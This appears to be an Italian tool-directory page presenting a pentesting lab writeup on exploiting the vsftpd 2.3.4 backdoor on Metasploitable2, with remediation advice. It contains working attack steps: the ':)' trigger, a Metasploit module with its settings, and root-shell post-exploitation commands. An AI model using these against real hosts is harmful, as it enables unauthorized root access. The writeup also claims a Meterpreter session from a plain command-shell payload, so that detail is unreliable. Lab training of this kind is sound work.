Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
metasploitable2-vsftpd-writeup — Sfruttare il backdoor di vsftpd 2.3.4 (CVE-2011-2523) su Metasploitable2 — un writeup di laboratorio pratico di pentesting che copre ricognizione, sfruttamento e rimedio. | Kitploit
Strumenti/GitHubGitHub/rsakthikumar-cmd/metasploitable2-vsftpd-writeup
RicognizioneScanner di VulnerabilitàAnalisi delle VulnerabilitàExploitPost-ExploitPenetration TestingApprendimento e FormazioneLab e Pratica

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
GitHub
rsakthikumar-cmd/metasploitable2-vsftpd-writeup

metasploitable2-vsftpd-writeup

Sfruttare il backdoor di vsftpd 2.3.4 (CVE-2011-2523) su Metasploitable2 — un writeup di laboratorio pratico di pentesting che copre ricognizione, sfruttamento e rimedio.

Vedi Repository
1 giorno faNon ancora revisionato
Condividi

Metasploitable2 — Sfruttamento della backdoor vsftpd 2.3.4

Un laboratorio pratico che dimostra la scoperta e lo sfruttamento di una vulnerabilità backdoor nota in vsftpd 2.3.4, utilizzando un ambiente isolato Kali Linux ↔ Metasploitable2.

Obiettivo

Esercitarsi nel flusso di lavoro principale del penetration testing — ricognizione, identificazione delle vulnerabilità, sfruttamento e verifica post-sfruttamento — contro una macchina target deliberatamente vulnerabile.

Ambiente di laboratorio

ComponenteDettagli
AttaccanteKali Linux 2026.1 (VMware)
BersaglioMetasploitable2 (VMware)
ReteNAT, isolata da host/internet
IP del bersaglio192.168.233.129

Entrambe le VM sono state mantenute sullo stesso segmento di rete privato, isolate dalla rete reale, per garantire che l'esercitazione non avesse alcuna esposizione esterna.

Metodologia

1. Ricognizione — Scansione Nmap

root@kitploit:~
nmap -sV -sC 192.168.233.129

È stata eseguita una scansione del target per individuare porte aperte e versioni dei servizi. I risultati includevano:

root@kitploit:~
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
...

Scansione Nmap che mostra vsftpd 2.3.4

2. Identificazione della vulnerabilità

La porta 21 eseguiva vsftpd 2.3.4. Questa specifica versione è pubblicamente nota per contenere una backdoor: nel 2011, l'archivio sorgente ufficiale di vsftpd è stato compromesso e vi è stato inserito codice malevolo. Effettuare il login con un nome utente contenente la stringa :) attiva un listener nascosto sulla porta TCP 6200, concedendo una shell remota senza autenticazione.

  • Riferimento: CVE-2011-2523
  • Impatto: Esecuzione remota di codice non autenticata come root

3. Sfruttamento — Metasploit

root@kitploit:~
msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.233.129
set payload cmd/unix/interact
run

L'exploit ha attivato con successo la backdoor e ha restituito una sessione Meterpreter.

Esecuzione dell'exploit Metasploit che mostra una sessione Meterpreter aperta

4. Verifica post-sfruttamento

root@kitploit:~
sessions -i 1
sysinfo
getuid

Confermati la sessione attiva e il livello di accesso sull'host compromesso.

Output di sysinfo

Output di getuid che conferma l'accesso root

Risultato

Ottenuto l'accesso completo a una shell remota con privilegi root sulla macchina target, senza richiedere autenticazione, sfruttando un singolo servizio obsoleto e contenente una backdoor.

Causa principale

  • Versione del software obsoleta (vsftpd 2.3.4) nota per essere stata compromessa alla fonte
  • Nessun processo in atto per rilevare o correggere una versione di servizio con vulnerabilità note

Rimedi

  • Aggiornare vsftpd a una versione corrente e verificata come pulita
  • Scaricare sempre i pacchetti software da repository ufficiali/verificati con validazione dei checksum
  • Implementare scansioni periodiche delle vulnerabilità per individuare versioni di servizi obsolete prima della distribuzione
  • Limitare i servizi esposti non necessari (FTP) dove non richiesti, o collocarli dietro ulteriori controlli di accesso

Concetto chiave

Un singolo servizio obsoleto con una vulnerabilità pubblica nota è stato sufficiente per compromettere completamente il sistema — nessuno sviluppo di exploit personalizzato o tecnica avanzata richiesta. Questo evidenzia perché la gestione delle patch e l'igiene delle versioni sono fondamentali per la postura di sicurezza nel mondo reale.

Disclaimer

Questa esercitazione è stata eseguita esclusivamente contro Metasploitable2, una macchina virtuale deliberatamente vulnerabile progettata per la formazione sulla sicurezza, all'interno di una rete di laboratorio isolata, senza alcuna connessione a sistemi di produzione o infrastrutture di terze parti.

Scarica lo strumento